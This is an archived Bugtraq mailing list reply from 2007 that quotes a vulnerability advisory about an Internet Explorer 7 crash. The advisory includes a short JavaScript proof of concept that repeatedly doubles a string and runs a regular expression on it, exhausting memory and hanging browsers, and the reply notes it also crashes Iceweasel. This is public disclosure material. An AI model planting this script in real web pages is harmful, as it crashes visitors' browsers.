Bugtraq mailing list archives

Re: Internet Explorer Crash

From: The Anarcat <anarcat () anarcat ath cx>
Date: Tue, 17 Apr 2007 16:27:45 -0400

Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)

I would think that Firefox and most browsers implementing javascript
would die an horrible OOM death on this.

A.

On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
               while (z.length <= 
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) z+=z;
       var boum = reg.exec(z);

</script>

Goodbye


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 

The happiness of society is the end of government.
John Adams


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC
TCV7FOqA05H8sSDb0r8nSnk=
=J/DW
-----END PGP SIGNATURE-----

--

Attachment: signature.asc
Description: Digital signature

Current thread:

Internet Explorer Crash J. Oquendo (Apr 17)
- Re: Internet Explorer Crash The Anarcat (Apr 17)
  - Re: Internet Explorer Crash Mike Ely (Apr 18)
  - Re: Internet Explorer Crash simone colombo (Apr 19)
- <Possible follow-ups>
- Re: Internet Explorer Crash Thor (Hammer of God) (Apr 17)
  - Re: Internet Explorer Crash Tom Gregory (Apr 18)
    - Re: Internet Explorer Crash Rob Bartlett (Apr 18)
    - Re: Internet Explorer Crash Kevin Finisterre (lists) (Apr 19)
    - Re: Internet Explorer Crash Dave Walker (Apr 19)
    - Re: Internet Explorer Crash C. Bergström (Apr 19)
  - Message not available
    - Re: Internet Explorer Crash Thor (Hammer of God) (Apr 18)
- Re: Internet Explorer Crash elflord91 (Apr 18)